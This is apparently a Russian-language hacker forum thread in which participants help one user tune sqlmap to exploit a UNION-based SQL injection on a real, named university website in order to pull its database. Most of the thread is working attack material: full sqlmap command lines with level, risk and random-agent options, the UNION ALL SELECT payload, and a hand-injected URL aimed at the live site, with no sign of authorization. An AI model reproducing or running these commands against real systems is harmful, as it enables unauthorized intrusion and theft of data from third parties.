![]() |
Разбирабюсь с sqlmap.
Взял первую попавшуюся уязвимую ссылку: /threads/424558/page-3#post-3893898 и пытаюсь сканировать. Он находит только blind time based. Но, как понимаю, согласно ссылке выше, union определенно есть. Вот и не могу написать правильно, что бы нашлась именно union уязвимость. Если короче, то вот ожидаю, что такие параметры должны найти ее, плюс, немного оптимизировал, что бы время сканирования сократить. Хоть убей, но не могу понять, ЧЯДНТ. Код:
./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 -D mysql -v 4 |
Цитата:
|
Да, спасибо.
Как минимум, тут точно есть ошибка, но все равно это не помогает: Более правильный вариант: Код:
./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 --dbms=mysql -v 4 |
такие дупла тянут руками, или хавижем, нехрен тут скулмап городить
|
Цитата:
Вот и все еще хочу разобраться в нюансах sqlmap-а. Все же был бы признателен, если кто-то подскажет, как же все таки правильно задать конфигурацию, что бы вытянуть дамп с поиощью sqlmap. |
во первых добавь --current-db
во вторых смотри ещё в сторону --prefix --suffix |
sqlmap отправляет нужный запрос:
Код:
./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-char="100500" --union-col=20-30 --dbms=mysql -v 4 --prefix="" --suffix="--" --current-db --level 4 --risk 3 --random-agent --flush-session --threads=5Код:
[10:52:10] [PAYLOAD] 239 UNION ALL SELECT 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500# --Если просто руками вставить в адресную строку Код:
https://www.htw-dresden.de/index.php?id=9147&vid=239%20UNION%20ALL%20SELECT%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%23%20--Но sqlmap не хочет говорить о том, что беда имеет место быть. |
Добавил --string и вуаля:
Код:
./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-char="100500" --union-col=20-30 --dbms=mysql -v 4 --prefix="" --suffix="--" --current-db --level 4 --risk 3 --random-agent --flush-session --string="100500" |
| Время: 11:01 |